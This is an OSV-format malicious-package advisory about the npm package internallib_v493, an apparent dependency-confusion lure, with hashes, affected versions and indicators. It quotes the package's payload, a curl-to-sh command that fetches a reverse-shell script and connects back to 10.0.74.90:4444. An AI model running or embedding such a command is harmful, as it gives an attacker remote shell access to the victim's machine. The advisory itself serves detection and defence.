{"id":"MAL-2026-4585","summary":"Malicious code in internallib_v493 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7)\nThe package's sole exported function `command()` in index.js executes `/bin/bash -c \"curl https://reverse-shell.sh/10.0.74.90:4444|sh\"`, fetching a reverse-shell script from reverse-shell.sh and piping it directly to `sh` to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality — its only advertised export is the backdoor. The package name (`internallib_v493`) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source (`reuquire` instead of `require`) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export.\n","modified":"2026-05-26T06:02:37.238832337Z","published":"2026-05-22T01:24:23Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-05-22T01:27:25Z","id":"IN-MAL-2026-004112","source":"amazon-inspector","sha256":"5212257564fabb7f11b34470ea266dd958cc2379cd211d57705e158c96fdaf75","import_time":"2026-05-26T05:51:57.765013526Z","versions":["1.0.3"]},{"modified_time":"2026-05-22T01:30:33Z","source":"amazon-inspector","id":"IN-MAL-2026-004113","sha256":"5ab65af9adef5ba807215c2e5880c940bf73f7c4312bc90c1bd21df1246f6931","import_time":"2026-05-26T05:51:57.860862258Z","versions":["1.0.4"]},{"versions":["1.0.2"],"source":"amazon-inspector","id":"IN-MAL-2026-004111","sha256":"67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7","import_time":"2026-05-26T05:51:57.661975934Z","modified_time":"2026-05-22T01:24:23Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v493/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v493/v/1.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v493/v/1.0.2"}],"affected":[{"package":{"name":"internallib_v493","ecosystem":"npm","purl":"pkg:npm/internallib_v493"},"versions":["1.0.3","1.0.4","1.0.2"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v493/MAL-2026-4585.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"index.js","tlsh":"84d023f6d44507ae734c37e6dd11f0656857dc20653951e0fa445152141b84e32111fb","sha256":"45c455288053ae5841b51a5d097f228a5aa8746fc0b18d693cb51a2d679f2e54"},{"path":"package.json","tlsh":"cbd0a9240a221833a5c9032a0caa9482b2208f3f10807c08139b182c40dfab3acfa31c","sha256":"2513063aaea22f6266eab6a9ba65e34943f833bb43380af1dc08a4ad7286ec88"}],"package_integrity":[{"hashes":{"sha1":"b4b79317eada40d14a030c54a0fe5febceedd29e","sha512_sri":"sha512-n13Ff8KR7++ShbccrgieTpX2RCw1FphudmBj22kXbySK7gyfRY3TGyWTBL2nTu6XrjZATIa1FNBu+5W9whmm8Q=="},"filename":"internallib_v493-1.0.3.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}